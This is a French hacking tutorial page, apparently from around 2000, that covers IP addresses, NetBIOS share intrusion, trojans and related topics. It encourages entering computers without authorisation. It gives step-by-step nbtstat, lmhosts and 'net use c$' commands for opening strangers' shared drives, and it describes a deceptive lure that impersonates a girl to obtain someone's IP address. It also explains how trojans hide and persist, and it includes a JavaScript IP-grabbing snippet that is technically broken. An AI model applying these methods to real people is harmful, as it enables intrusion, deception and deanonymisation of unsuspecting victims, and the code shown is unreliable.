Hacking
auteur : RhylKim
repaging : [Rastaman]
Je tiens à préciser que je n'ai fait que du repaging sur cette page tant RhylKim était parfaite, excepté le niveau graphique que j'ai un peu essayé de relever.
Je laisse donc la parole à RhylKim qui a l'air de parfaitement maïtriser le sujet.
 
 
Descriptif du contenu de cette page
http://rhylkim.tsx.org/ 
1°  Définition
2°  Notion d'exploit
3°  Adresses IP
4°  Netbios sous Win 95/98/Millenium
5°  Netbios sous Win NT/2000
6°  Troyan Horse (cheval de Troie) 
7°  Blooffer
8°  Flooder
9°  Sniffer
10°  Scanner d'ip
11°  Spoofing
12°  Root
13° Hack par ftp
14°  Les ports
15°  Les Firewalls
16°  Les droits sous UNIX
17°  Les Passwords shadows
18°  NukeNabber et Port Watchers
19°  Cgi-bin et Scripts
20°  Cerner une cible
21°  Pièges à éviter
22°  Structure d'un fichier passwd UNIX
23° SunOs 4.1 Shadows
24°  LINUX
25°  Installation de Linux
26°  Sécuriser son Linux
27°  Micro$oft NT (new technologie)
28°  Effacer ses traces
29°  NFS
30°  NIS
31° Backdoors
32° D.O.S. (denial of service)
Par RhylKim 
 
Définition
Un hacker c'est quoi ? Pour la première définition de ce site, je vais essayer de m'appliquer... C'est un mec (ou une fille, désolé mais faut avouer que vous êtes en très forte minorité) qui rentre dans des ordinateur où il n'a pas de droit d'accès et qui jette un coup d'oeil un peu partout pour voir s'il trouve pas quelque chose d'intéressant. Certains affirmeront qu'ils sont là pour la régulation de l'Internet ou pour en refaire un espace fun et non un espace commercial comme il est de plus en plus voué à devenir. A chacun de voir... Définition pour les simples d'esprits et les personnes ayant un esprit particulièrement fermé: les hackers c'est les gentils et les crashers c'est les méchants. Quoi que des fois, dur de faire la différence entre un crasher et un hacker en colère...

Ca c'était ma définition perso mais il en existe une perso de "the mentor", très bien écrite et qui représente bien la manière dont pas mal de Hackers se sont mis au biz même si elle ne me correspond pas. Elle est cent fois mieux que la mienne et j'aimerais écrire comme lui. Mais j'ai pas fais Littéraire moi. arf ! vocation?

Définition de "The Mentor" : (écrite le 8 janvier 1986 et traduite par NeurAlien le 8 septembre 1994. source: Noway3)

+++ The Mentor +++

Un autre s'est fait prendre aujourd'hui, c'est partout dans les journaux. Scandale: Un adolescent arrêté pour crime informatique, arrestation d'un 'Hacker' après le piratage d'une banque...
Satanés gosses, tous les mêmes.

Mais avez vous, dans votre psychologie en trois pièces et votre profil technocratique de 1950, un jour pensé regarder le monde derrière les yeux d'un hacker? Ne vous êtes vous jamais demandé ce qui l'avait fait agir, quelles forces l'avaient modelé ?
Je suis un hacker, entrez dans mon monde...
Le mien est un monde qui commence avec l'école... Je suis plus astucieux que la plupart des autres enfants, les conneries qu'ils m'apprennent me lassent...

Je suis au collège ou au lycée. J'ai écouté les professeurs expliquer pour la quinzième fois comment réduire une fraction. Je l'ai compris. "Non Mme Dubois, je ne peux pas montrer mon travail. Je l'ai fait dans ma tête".
Satané gosses. Il l'a certainement copié. Tous les mêmes.

J'ai fait une découverte aujourd'hui. J'ai trouvé un ordinateur. Attends une minute, c'est cool. Ca fait ce que je veux. Si ça fait une erreur, c'est parce que je me suis planté.
Pas parce qu'il ne m'aime pas...
Ni parce qu'il se sent menacé par moi...
Ni parce qu'il pense que je suis un petit filous...
Ni parce qu'il n'aime pas enseigner et qu'il ne devrait pas être là...
Satanés gosses. Tout ce qu'il fait c'est jouer. Tous les mêmes.

Et alors c'est arrivé... Une porte s'est ouverte sur le monde... Se précipitant a travers la ligne téléphonique comme de l'héroïne dans les veines d'un accro, une impulsion électronique est envoyée, on recherche un refuge à l'incompétence quotidienne... Un serveur est trouvé.

Vous vous répétez que nous sommes tous pareils... On a été nourri à la petite cuillère de bouffe pour bébé à l'école quand on avait faim d'un steak... Les fragments de viande que l'on nous a laissé étaient pré-machés et sans goût. On a été dominé par des sadiques ou ignoré par des apathiques. Les seuls qui avaient des choses à nous apprendre trouvèrent des élèves volontaires, mais ceux ci sont comme des gouttes dans le désert.

C'est notre monde maintenant... Le monde de l'électron et de l'interrupteur, la beauté du Baud. Nous utilisons un service déjà existant, sans payer ce qui pourrait être bon marché si ce n'était pas la propriété de gloutons profiteurs, et vous nous appelez criminels. Nous explorons... et vous nous appelez criminels.
Nous recherchons la connaissance... et vous nous appelez criminels.
Nous existons sans couleur de peau, sans nationalité, sans dogme religieux... et vous nous appelez criminels.
Vous construisez des bombes atomiques, vous financez les guerres,
vous ne punissez pas les patrons de la mafia aux riches avocats,
vous assassinez et trichez, vous manipulez et nous mentez en essayant de nous faire croire que c'est pour notre propre bien être, et nous sommes encore des criminels.

Oui, je suis un criminel. Mon crime est celui de la curiosité. Mon crime est celui de juger les gens par ce qu'ils pensent et dise, pas selon leur apparence.
Mon crime est de vous surpasser, quelque chose que vous ne me pardonnerez jamais.

Je suis un hacker, et ceci est mon manifeste. Vous pouvez arrêter cet individu, mais vous ne pouvez pas tous nous arrêter... après tout, nous sommes tous les mêmes.

+++ The Mentor +++

Un citation d'un illustre inconnu pour moi mais qui dira sûrement quelque choses à pas mal d'entre vous:
"Savoir c'est vivre, et maintenir dans l'ignorance c'est presque un homicide" (cf: posse Assassin "Homicide Volontaire")

Notion d'exploit :

Me demandez pas pourquoi ça s'appelle comme ça, j'en sais rien, surtout que je trouve le nom particulièrement mal choisi. Les exploits ce sont des procédures que l'on exécute de la même manière chaque fois et qui ne demande pas trop que l'on réfléchisse. Un hacker qui ne fait que des exploits ne peut se considérer comme étant d'un bon niveau. Deux exploits très très connus ci-dessous: Win95 et WinNT. Un exploit est également un petit programme que l'on fait soit même, que l'on met sur un bécane une fois un brèche ouverte et qui travaille pour vous. Il fait en sorte de vous procurer des accès plus intéressants, notamment celui du root.

Adresses IP :
 
1°  Définition
2°  Fonctionnement
3°  Trouver une ip
4°  Cacher une ip
          -Définition:

Chaque ordinateur connecté à Internet en a une et elle sert à recevoir les informations que l'on demande via Netscape ou autre... et également à recevoir des E-Mails. Pour une question de sécurité ou de volonté de disponibilité d'adresses pour tout le monde, les adresses IP qui vous sont données par votre fournisseur d'accès changent à chaque connexion (IP dynamiques). Ce qui n'est pas le cas pour les serveurs et les sites de Fac par exemple. Donc si vous trouvez l'adresse IP d'une personne, il est très fortement probable qu'elle ne lui appartienne plus le lendemain.

          -Fonctionnement:

Une IP, qu'il est nécessaire de rentrer dans une commande nbtstat par exemple, est en fait une représentation numérique d'une adresse binaire 32 bits. Elle se décompose de la manière suivante: 152.32.45.210. Dans cet exemple, 152.32 est l'adresse d'un réseau, le 45 est celui d'un sous réseau et le 210 est l'adresse quoi que dans certains cas, les deux derniers numéros soient la composante d'une adresse (pour les fournisseurs d'accès Internet par exemple: AOL, c'est 152 pour le premier numéro, les trois autres variant constamment). Vu que c'est du 32 bits, une adresse IP ne peut pas dépasser 255.255.255.255.

Si vous voulez connaître le premier numéro de l'adresse ip de tel ou tel fournisseur d'accès, utilisez un scanner d'ip. Rentrez une adresse au hasard et regarder à quel fournisseur elle appartient et vous vous ferez ainsi une petite liste des ip des fournisseurs d'accès. Recommencez l'opération en changeant le premier numéro... C'est pas très intéressant et c'est chiant mais c'est pas si long à faire que ça. Les mecs qui ont programmé les scanners d'ip l'ont bien fait avant vous... Vous trouverez plusieurs scanner d'ip dans la partie progs de ce site.

          -Trouver une adresse ip :

Trouver une adresse ip au hasard c'est facile mais on ne sait pas à qui elle appartient. Voilà comment trouver l'ip d'une personne ou d'un serveur:

- On va commencer par le commencement: vous. Comment trouver son ip? tapez démarrer, exécuter, winipcfg (WINdows IP ConFiGurator), là vous obtiendrez des informations sur votre pc avec entre autre votre adresse ip. Si cette commande ne marche pas car vous n'avez tout simplement pas ce fichier, il existe une autre méthode, c'est de s'autonuker. Je sais c'est barbare mais on ne risque rien si l'on a placé une protection efficace, Dans la partie progs de ce site, j'ai mis un nuker qui permet d'installer une protection antinuke et aussi de s'autonuker. Si la protection est mise vous ne risquez rien et le nuker vous donnera votre adresse ip.

- Si vous voulez trouver l'adresse ip d'un serveur, vous poussez entrer une commande qui testera la rapidité avec laquelle vous dialoguez avec ce serveur. Avec la vitesse la commande vous donnera aussi l'adresse ip du serveur:
tapez: ping -a URLduserveur       exemple: ping -a www.assassin.com  l'URL du serveur est http://www.assassin.com/.
Cette commande doit être tapée sous dos.
Il existe une variance de la commande ping sur irc mais elle ne permet que de déterminer la rapidité des communications entre un membre et un autre membre. Pour trouver son adresse ip, on opère comme suit.

- Si vous êtes sur irc et que vous voulez trouver l'adresse ip d'une mec y étant également:
tapez: /dns pseudo_du_mec      exemple: /dns assassin   le mec a comme pseudo: assassin.
Cette commande doit être tapée sur irc.

- Si vous êtes sur icq et que vous voulez l'adresse ip d'un mec y étant aussi, il suffit d'aller dans ses infos. Pour cela, cliquez sur son pseudo puis sur info. S'il l'a caché, il y aura marqué N/A dans le place prévu à cette effet. Pour trouver son adresse, bien que ce petit futé l'ai caché, laissez la fenêtre info ouverte, mettez votre icq sur "offline" et fermez la fenêtre info. Maintenant retournez dans ses infos de la même manière et à l'endroit où il y avait marqué N/A, il y a maintenant son adresse ip.

- Une autre manière de trouver l'adresse ip d'une personne sous icq si vous avez une ancienne version d'icq ou si la précédente méthode ne marche pas, c'est netstat. Pour le lancer faites: Démarrer, Exécuter, et tapez "netstat". Là une fenêtre s'ouvrir mais se refermera très vite alors faites une copie d'écran à l'aide du bouton "Impr écran" du clavier. Pour que netstat marche, il faut que vous envoyez juste avant un message au mec dont vous voulez l'ip, puis lancez netstat, copie écran, coller dans paint et voilà, vous avez son ip.

- Une autre manière de trouver l'adresse ip d'un serveur c'est d'ouvrir ftp. Ftp existe pour permettre la transmission de fichiers. Pour le lancer, si vous êtes sous win, faites Démarrer, Exécuter, et tapez "ftp - n". Là, une fenêtre s'ouvre:
tapez: open URLduserveur. exemple: open www.assassin.com l'URL du serveur est ici www.assassin.com.
Cette commande doit être tapée sous ftp.

- Maintenant si vous voulez l'ip d'un mec ne se trouvant pas sur icq ni sur irc mais que vous savez qu'il est connecté (par exemple s'il utilise les salons d'abonné aol, infonie, club internet, ...), il y a un moyen c'est le mail. Mais c'est quand même beaucoup plus compliqué que les autres manières et c'est surtout chiant à faire mais peu connaissent cette méthode et beaucoup se sentent invulnérable du fait qu'ils croient que leur ip est cachée (pour le commun des mortels en tout cas). On va faire comme si vous étiez sur AOL. Une fois que vous avez repéré le mec de qui vous voulez l'ip, vous allez lui envoyer un Mail (son adresse est: pseudo@aol.com) par un serveur  POP3, c'est à dire un société d'envois de mails gratuits comme Yahoo, Caramail, multimania, ... Dans ce courrier vous allez poser une question quelconque mais vous allez faire croire au mec qu'il sagit d'un truc important pour vous et que vous avez besoin absolument d'une réponse. A vous de trouver la question. Vous pouvez vous faire passer pour une fille si c'est un mec, joindre une photo (belle) de vous (soit disant vous mais prenez la photo d'une fille assez jolie et non connue) pour que le mecs soit appâté. Ecrivez qu'un de ses potes vous a parlé de lui et que vous aimeriez le rencontrer... Bref, vous l'appâtez pour qu'il veuille vous répondre. Vous allez écrire dans le courrier que vous aimeriez une réponse rapide et même instantanée si possible (vu que c'est des ip dynamique, il faudra que vous l'ayez durant cette connection) mais que votre boite aux lettres aol ne marche pas et qu'il faut que, comme vous, il passe par le serveur POP3. Bien sur vous lui expliquez dans le mail comment faire et en détail car s'il a une quelconque question, vous êtes supposé injoignable et donc c'est foutu. Maintenant il va falloir qu'il aille regarder son courrier et pour ça il y a une commande cool sur aol dans les salon (malheureusement trop connue) qui permet de faire des sons notamment faire croire qu'il a du courrier. C'est commande est à taper dans le salon de discussion où le mec est. voilà la commande {S courrier. Trouvez une couleur pour que ça se camoufle avec le fond de l'écran et le tour est joué. Si vous n'êtes pas sur aol ou que vous avez peur qu'il le voit ou qu'il connaît déjà le technique, demander a un pote a vous que le mec ne connaît pas de lui dire qu'il vient de lui envoyer un mail. Le mec ne verra rien sauf votre mail et y répondra. Si il prend la tête a votre copain, dite lui de dire qu'il s'est trompé de pseudo et qu'il est désolé. Maintenant il va vous réécrire et passer par le serveur POP3. et quand vous recevrez le mail vous aurez ce qu'il a écrit plus plein de lignes en dessous avec plein de trucs en anglais. Voilà, normalement la première ligne contient l'ip du mec. Il y a pleins de lignes et pleins d'ip différentes mais si vous êtes pas trop con vous comprendrez aisément à qui elles appartiennent. Voilà, vous avez son ip, faites pas de conneries avec cependant. Si un mec essaye de chopper mon ip ou essaye cette technique avec moi je le décalque. Bien sur cette technique marche dans les deux sens ce qui veut dire qu'en envoyant le premier mail, le mec aura votre ip mais il y a peu de chance qu'il ait lu cet article et de toute façon c'est pas vous qui avez envoyé ce mail une blonde pulpeuse qui veut un rdv (ou une brune, je sais pas quelle photo vous mettrez ;-) ). Et de toute façon comme vous ne passez pas par aol, le mec ne connaîtra que le pseudo que vous aurez donné au serveur POP3. Là, si vous voulez, vous pouvez faire un lieu de votre adresse du POP3 à celle d'aol (c'est expliqué quand vous prendrez une nouvelle adresse là-bas)... attention il arrive des fois que vous n'obteniez de cette façon que l'adresse ip du pop3 du fournisseur d'accès internet du mec, dans ce cas là, dommage. Et tout les "nbtstat -A" n'y changeront rien.

- Une autre méthode si vous voulez avoir l'ip d'un mec ne se trouvant ni sur irc et icq, c'est NukeNabber. En effet ce programme vous permet de connaître l'ip d'un mec essayant de se connecter à votre pc et lui refusant systématiquement l'entrée. Bien sûr pour cela il faudra que vous lui donniez votre ip et qu'il sache ce que c'est car pour une personne n'y connaissant rien, que voulez vous qu'elle fasse de 4 nombres séparés entre eux par des points? Dès que la personne essaie d'entrez ou de vous nuker... vous avez son ip et bien sur vous n'êtes pas nuké.

- La dernière méthode que je connais pour avoir l'ip d'un mec ne se trouvant ni sur irc ni sur icq, c'est de le faire venir sur votre ordinateur. En effet une fois en connection avec votre pc, vous verrez l'ip du mec. Bien sûr il faut le faire venir et pour ça il va déjà falloir transformer votre pc en serveur. Alors soit vous avez linux et vous configurez un serveur PPP ou apache ou alors vous êtes sous win et vous devrez téléchargez servU (sur www.Download.com me dit Jah). Une fois installé et configuré, votre pc est devenu un serveur au même titre que ceux qui ont des sites sur Internet. La seule différence c'est que vous n'avez qu'une ip et pas d'adresse DNS (adresse DNS, c'est une adresse genre www.micro$hit.com. En effet pour qu'un serveur ait droit à une adresse de ce genre et non plus qu'une simple ip, il faut qu'il paye entre 500 et 1000 Frs à un organisme dont j'ai oublié le nom. Bah ouais c'est quand même plus facile à retenir une adresse DNS qu'une IP). Ca vous fait flipper ça! Et oui, n'importe qui ayant votre ip peut entrer dans votre pc par un accès ftp. Bien sûr la but ici n'est pas qu'il ait accès à votre "serveur" mais que vous ayez son ip alors vous allez mettre un firewall qui se chargera de ne faire entrer personne sur votre disque. Enfin juste assez pour que vous ayez son ip et que lui ne puisse rien faire une fois à l'intérieur. Si vous êtes sous windows, vous pouvez utiliser celui de McAfee disponible sur ce site partie progs ou le Conseal firewall (très bon) disponible bientôt. Si vous êtes sous linux, bah amusez vous à décompiler et recompiler le noyau une fois le firewall installé (youpi!).
Cette méthode est plus chiante que celle avec NukeNabber mais au moins vous pourrez avoir l'ip de tout le monde même de celui qui ne sait pas ce qu'est une ip. Pour l'amener sur votre serveur, il suffira de faire un liens dans le salon de discussion ou vous êtes et de lui demander de cliquer dessus et prétextant ce que vous voulez. Il suffit de dire que c'est votre site et que vous aimeriez un avis de sa part... Les personnes méfiantes pour les virus et les .exe ne le sont généralement pas pour les liens. Les seuls qui se méfieront c'est ceux qui connaissent la combine.

- Bon finalement c'était pas la dernière. Celle là j'hésitais à la donner car une fois donnée elle va être utilisée à profusion pour votre plus grand malheur à tous alors si vous êtes pudiques ne lisez pas ça car ça pourrait vous rendre parano à l'extrème et je vous avoue qu'il y a de quoi. Bon alors j'hésitais et comme j'hésite encore je ne vais vous donner qu'une partie (grande partie) de la réponse. Le truc c'est d'envoyer une personne sur un site qui a une adresse DNS et non juste une ip (et oui c'etait l'inconvénient de la combine du dessus) et la même si une personne connait la combine elle n'aura aucun moyen de savoir si vous voulez la pièger ou non. Le truc c'est de mettre une instruction en java dans votre page web qui lit l'ip du visiteur et l'envoit à votre adresse E mail. Il ne reste plus qu'à faire un lien vers votre site et que la personne clique dessus ou que vous donniez juste l'adresse. Le seul inconvenient de cette technique c'est que si plusieurs visiteurs viennent en meme temps vous ne saurez pas quelle est l'ip de la personne que vous voulez pièger. Mais bon pour ca il suffit d'envoyer la personne sur un page isolée ou personne ne peut aller s'il n'a pas eu de lien par vous. Un autre inconvenient c'est que la personne si elle se méfie trouvera votre adresse Email mais encore une fois il suffit de vous inscrire chez hotmail ou caramail pour que vous vous foutiez de perdre une boite aux lettres à cause d'un mailbombing. J'ai dis que je ne vous donnerais pas tout donc je vais vous donner l'instruction java qui trouve l'ip et l'affiche sur une page web mais je ne donnerais pas l'instruction permettant d'envoyer cette ip à une adresse Email ou à cacher cette ip du visiteur. Mais franchement si vous vous y connaissez un peu en java et en html ça ne devrait pas vous poser trop de problèmes. En tout cas moi j'en ai eu pour deux minutes. L'instuction java est la suivante:

<SCRIPT LANGUAGE="JavaScript">
myAddress2 = java.net.InetAddress.getLocalHost();
ip   = myAddress2.getHostAddress();
document.write("Ton adresse Ip est :"+ip);
</SCRIPT>

Voilà, bien sûr si la personne, pour se connecter à internet a utilisé un blooffer, un spoofer d'ip ou passe par un proxy, vous l'aurez dans l'os mais vous connaissez combien de personnes qui font ça avant de se connecter à internet à part moi? Ca doit répondre à votre question sur la fiabilité de la méthode.

          -Cacher son adresse ip :

J'imagine que vous n'avez pas de serveurs alors on va parler de la manière de cacher son ip pour un particulier, c'est à dire sous irc et icq.

- Sous icq, cliquez sur menu en bas à gauche de la fenêtre principale, puis sur préférence, puis connection, puis "i'm using a permanent internet connection (LAN)", puis "i am behind a firewall or proxy", puis firewall setting", puis "Firewall Settings", puis "I am using a SOCKS4 proxy server", puis next, là entrez l'adresse ip que vous voulez (pas la votre sinon ça ne sert à rien) et mettez le port 1080 (celui d'icq), puis next, Done, ok, et enfin ok. Icq va s'arrêter et quand vous le relancerez, votre adresse ip restera la même mais ceux qui chercheront la votre tomberont sur celle que vous avez défini plus haut. Cette méthode pourra entraîner quelques problèmes de connexion mais ils seront minimes. Le programme icq connaîtra toujours votre véritable ip sinon vous ne pourriez communiquer mais si quelqu'un la cherche il ne la trouvera pas, sauf s'il utilise un programme externe comme par exemple netstat (expliqué plus haut).

-Sous irc il va falloir faire appel au spoofing ce qui ne revient pas en fait à cacher son ip mais tout simplement en changer en prenant celle d'un autre mec connecté lui aussi sur irc. Cliquez ici pour savoir comment faire.
 

Netbios sous Win 95 / 98 / Millenium :

C'est du super connu, du super facile mais rigolez pas, c'est par ça que j'ai commencé et quand j'ai découvert cet exploit sur un site (ça fait longtemps maintenant) j'étais tout joisse (hyper méga content, pour ceux qui connaissent pas l'expression). Bon, ok ça marche une fois tout les 36 du mois et je peux vous dire que j'ai passé du temps avant de hacker ma première bécane avec cette méthode mais bon, c'est quand même de bons souvenirs. Cet exploit marche sous win95 mais aussi sous win98 mais pour cela il faut que l'utilisateur de la machine prise pour cible ait choisi le partage de fichiers (ce qui est plutôt rare car win95 et 98 c'est surtout pour les particuliers alors que le partage réseau est surtout utilisé par les entreprises mais les entreprises ne sont pas foule à posséder win95 sur leur serveurs).

Comme je n'utilise plus cet exploit depuis longtemps, je ne suis plus très au fait des manières de le réadapter, et il faudra que je me renseigne plus à fond sur ce que je vais vous affirmer maintenant. Mais j'ai l'impression que c'est exploit à de nouveau de beaux jours devant lui car windaube 98 dès son installation installe le partage de fichier (mais pas d'imprimante, mais ça, une fois dans la bécane ça se change). Donc pour les personnes (nombreuses) ne connaissant pas cet exploit, ne connaissant pas l'utilité du partage de fichiers, ou tout simplement n'y connaissant que dalle en informatique (ce qui est de plus en plus le cas avec ces ordinateurs tout installé et tout configuré, même Internet) sont à votre portée.

Cette info n'est pas du tout du 100% sûr mais je vérifierais et je vous tiendrais informé. N°1 sur l'info locale et internationale...

L'exploit:

C'est un exploit qui se réalise sous Dos puisqu'on utilise le NetBios et l'on a besoin d'une adresse IP, du nom de l'ordinateur distant, et que le propriétaire de ce dit ordinateur ait cliqué sur "partage de fichiers". Ok, ça fait beaucoup de choses à connaître mais vous allez voir, ça se décante vite. En fait ce qu'il vous faut c'est une ip que vous trouverez au hasard et qui doit être celle d'un ordinateur partagé (comprenez par là: avec ressources partagées).

Manière de procéder :

1°/  Pour le réaliser il faut ouvrir une fenêtre MS-DOS si vous êtes sous windows; là, tapez la commande suivante qui vous permettra de trouver le nom de l'ordinateur à qui appartient cette adresse ip:

nbtstat -A ip_de_l'ordinateur_distant

          Si vous avez pas compris, je donne un exemple:  nbtstat -A 125.35.23.210
          (l'adresse ip a été choisie au hasard et le A doit être en majuscule. Les espaces ont leur importance)

2°/  Ensuite vous allez voir apparaître différentes lignes de codes. Suivant si vous tombez sur une adresse étant attribuée ou pas, ces lignes diffèrent. Si un message d'erreur s'affiche (host not found), changez d'adresse, si des kyrielles de lignes s'affichent, c'est cool mais c'est pas suffisant. Il faut maintenant que la ligne suivante s'affiche parmi celles qui s'affichent.:

nom_de_l'ordinateur_distant<XX>UNIQUE Registered

          Si vous n'avez toujours pas compris, je vais vous redonner un exemple: assassin<20>UNIQUE Registered

(assassin est le nom de l'ordinateur distant. <XX>, XX est un nombre qui varie d'un
ordinateur à l'autre mais le 20 indique que les ressources sont partagées.)

3°/  Bon maintenant que vous avez l'ip et le nom de l'ordinateur distant, vous allez ouvrir et modifier l'éditeur de Dos en tapant la commande suivante:

edit lmhosts

4°/  Maintenant que vous êtes dans l'éditeur de Dos, vous allez taper les commandes suivantes:

ip_de_l'ordinateur           nom_de_l'ordinateur              #PRE

          Si là encore vous avez rien pigé, je commence sérieusement à me demander si vous n'êtes pas un peu lamerz sur les                   bords. Mais comme j'ai une incroyable grandeur d'âme (sans modestie aucune), je vais encore une fois vous expliquer               avec un exemple: 125.35.23.210           assassin             #PRE
          (même chose que précédemment et respectez les majuscules à l'endroit où j'en ai mis)

5°/  Enregistrez et quittez l'éditeur. De retour sur le Dos, tapez la commande suivante:

nbtstat -R

          Vous devriez normalement obtenir: "Successful purge and preload of the NBT Remote Cache Name Table"

6°/  Tapez maintenant:

net view \\nom_de_l'ordinateur

          C'est à ce moment la que tout se joue, si les ressources de cet ordinateur sont partagées, vous obtiendrez un inventaires             des ressources partagées (c,d,e, ...) sinon il n'y aura rien dans cet inventaire.

7°/  Placez vous dans le répertoire de windows (je vous explique pas comment faire, si vous savez pas, prenez des cours au CNED).

8°/  A présent tapez:

net use \\nom_de_l'ordinateur\X

          Les espaces ont de l'importance et vous remplacerez naturellement "nom_de_l'ordinateur" par "assassin" et le X par la               lettre de la partition à laquelle vous désirez accéder. Si vous voulez accéder dans le répertoire où se trouve windows,               tapez c$ à la place du X.

Voilà, vous êtes sur le disque c de l'ordinateur distant ayant comme nom assassin et comme adresse IP 125.35.23.110, n'y faites pas trop de conneries; souvenez vous, c'est la partie hacking, pas crashing. Si vous avez besoin de revenir sur cet ordinateur à l'avenir, faites une recherche (démarrer, rechercher, ordinateur) et tapez "assassin".

Si c'est la première fois que vous utilisez cet exploit, il faut créer un fichier lmhosts, pour cela, allez sous dos et tapez:
Edit, nouveau, ip_de_l'ordinateur          nom_de_l'ordinateur_distant          #PRE, sauvegarder, lmhosts, exit.
Le fichier lmhosts doit se trouver dans le répertoire windows.

C'était un bon petit exploit pour ceux d'entre vous qui débutent et de la rengaine pour les autres. En tout cas je voyais pas mon site sans ce classique.

Netbios sous Win NT / 2000 :

C'est exactement la même chose que pour windaube 95 ou 98 sauf que vous n'avez pas besoin de créer de fichier lmhosts et qu'il y a beaucoup plus de chances que les ressources soient partagées. Et vu que c'est la même chose, je vous conseillerais de regarder ci-dessus car je n'ai pas l'intention de me répéter plus qu'il ne faut. ;-p

Troyan Horse (cheval de Troie) :

Le cheval de Troie, qu'est ce que c'est? C'est pas un truc en bois construit pas des mecs en armure pour prendre une ville fortifiée par la ruse, en tout cas, pas là. Si ça s'appelle comme ça, vous l'aurez compris, c'est parce que ça reprend la méthode... La forteresse c'est le PC, le cheval c'est le prog, l'assaillant c'est toi et la victime est dans la merde. Le biz consiste à envoyer à un mec le troyen et de lui faire croire qu'il sagit d'autre chose... Le mec le lance et là, si vous avez son adresse IP, vous pouvez contrôler son ordinateur. Quand je dis contrôler c'est tout contrôler, vraiment tout. Vous pouvez imprimer des trucs avec son imprimante, lui piquer des fichiers, jouer à ses jeux, formater son disque, diriger le pointer de sa sourie, piquer ses passwords ...etc... C'est en partie pour ça que je considère le troyen plus comme un programme de crashers mais j'ai tenu malgré tout à le mettre dans cette rubrique. Me demandez pas pourquoi, les lubies du Webmaster sans doute.

Le troyen a existé en trois versions différentes à ce que je sache. Les deux premiers étaient des progs que l'on envoyait en faisant croire que c'était autre chose (des nukers par exemple, ça intéresse tellement de monde sous irc) mais dès le lancement du programmes, un message d'erreur s'affichait ( genre: GT0075FR.dll has not found ) et vous étiez infecté alors que vous pensiez juste: "Merde, ça marche pas". Et puis un jour, sans savoir pourquoi, alors que vous reveniez sur irc, vous n'avez plus le contrôle de votre pc, dommage...

La troisième version est la plus sadique, elle se compose comme les précédentes de deux parties, l'une que l'on envois à la victime et l'autre que l'on garde et qui nous permet de contrôler l'ordinateur disant. Dans cette version, on garde les deux progs, car ce que l'on envois n'est plus un troyen mais un programme sain (la dernière version de netscape par exemple) que l'on a infecté avec un troyen. Et ce qui est terrible c'est que le programme infecté n'augmente même pas de volume (certains disent que le prog augmente de 100 Mo mais c'est faux) et qu'il fonctionne très bien.

Il ne faut pas que ceci vous incite à ne plus revenir sous irc ou icq car il existe des "bouffe-troyens" qui, je vous le donne en mille, ... Ca se trouve très facilement d'ailleurs, dans la partie progs de ce site, vous trouverez les différents troyens existants ainsi que le bouffe-troyens. Je donne ces informations car comme je le disais plus haut, c'est des progs de crashers. Et ces personnes donnant une mauvaise image du Hacking... sus.

A cela des petits futés ont trouvé une parade, un prog tout con qui ne peut se faire détecter par un bouffe-troyen car il ne ne se met en service que quand un bouffe-troyen vérifie le système. Donc jusque là il n'est pas considéré comme troyen. Alors la personne très contente de posséder ce prog miracle ne se doute pas quelle est contaminée et...

Alors quand on vous envois un prog par Internet, vous le testez avec le bouffe-troyen au moins deux fois de suite et vous avez 99% de chances qu'il ne vous arrive rien. Mais bon comme les mecs qui programment ces trucs auront toujours une longueur d'avance sur ceux qui essayent de les en empêcher... faites gaffe de ne pas accepter des .exe, .bat, .zip et .com de tout le monde. Clickez pour télécharger un bouffe troyen. La version que je propose ici neutralise les troyens suivants: rundlls, dmsetup, dmsetup2, sockets de troie (version 1, 2.0, 2.3 et 2.5), control of sockets de troie (version 1 et 2.5), hacker's paradise,  backdoor, ICKiller, backorifice 120, netbus (version 1.53 et 1.6) et icqtrojen.

Avec BO (back Orifice) il y a un autre moyen de voir si vous avez été infecté mais ça ne marche que pour BO et ça n'empêche pas au bouffetroyen d'être efficace. Cette manière c'est de faire un ping vers l'ip 127.0.0.1 et si vous y voyez le nom de votre ordinateur c'est que vous êtes infesté. :-(

Comment ça marche? :

Dès que la victime lance la partie virus du troyen (celle qu'on lui refile), le programme va chercher a créer plusieurs fichiers .exe (généralement 3). La partie virus ne sert qu'à créer ces fichiers. Les fichiers sont souvent crées dans Windows/System mais ça dépends en fait de troyens. Si ils se foutent là c'est pour une bonne raison. Tous les ordinateurs ayant windows ont un point commun, ils ont windows (si si). Vous allez dire: "merci, ca nous renseigne vachement". Mais ca permet au troyen de ne pas a avoir a chercher un emplacement sympa différent dans chaque bécane ou il va. Je sais pas si vous êtes déjà allé faire un tour dans le répertoire system, mais il y a des tas de programme et personne n'est foutu de tous les retenir ou de dire a quoi ils servent tous.

Une fois bien caché et reproduis en suffisamment grand nombre pour que vous ne les viriez pas tous, ils vont chercher à se lancer au démarrage de la machine. Pour cela, ne croyez pas qu'il vous se contenter de se foutre dans Windows/Menu démarrer/Démarrage, ce serait trop simple, trop visible et surtout trop facile de les retrouver (quoi que je suis persuadé que plusieurs d'entre vous ne connaissaient même pas la fonction de ce répertoire ;-) ). Ils vont essayé de mettre une ligne de code qui les lancera au démarrage dans l'autoexec.bat à un endroit bien caché. C'est sûr que si vous avez deux applications qui se lancent au démarrage, vous voyez ces lignes tout de suite (et donc le nom et l'endroit où se trouvent les troyens) mais ça arrive qu'il y ait des centaines de lignes dans l'autoexec.bat et là c'est une autre affaire de les trouver. Encore plus vache, ils vont essayer de se mettre ces mêmes lignes dans la base de registre de windows. Pour ceux qui ne savent pas ce qu'est la base de registre de windows, c'est le coeur de win. C'est la que les informations sur tous ce que vous avez sur votre disque est écrit: les passwords, les nom des fichiers et leur places, la vitesse de défilement des fenêtres quand elles se minimisent... Si tu maîtrises la base de registre, tu maîtrises tout. Ces tonnes d'informations sont consultables en lançant Regedit dans Exécuter. Allez jeter un coup d'oeil et vous comprendrez pourquoi ils se foutent là. Si vous connaissez pas l'emplacement où ils se mettent c'est même pas la peine d'espérer. Mais les anti troyens les trouvent très bien donc il n'est pas nécessaire de connaître l'emplacement mais si malgré tout vous voulez la connaître, mailez moi.

Leur but n'est pas simplement de se lancer au démarrage ou de se reproduire. Ils ont fait ca pour leur propre sécurité et pour être sûr de pouvoir être opérationnel dès que la bécane est allumée. Opérationnel pourquoi? Les moyens de rentrer sur une bécane sont les ports et pour y rentrer il faut qu'ils soient ouverts. Les programmes crées sur la bécane de la victime servent à ça. Le port le plus souvent utilisé est le telnet (port 23) mais d'autre comme le ftp peuvent aussi servir. Ces programmes se camouflent de manière à ce que vous ne puissiez pas voir s'ils sont lancés et donc ne pas les interrompre. ex: Alt + Ctrl + Suppr n'est pas efficace pour les stopper puisque leur nom ne se trouve pas dans la fenêtre de win.

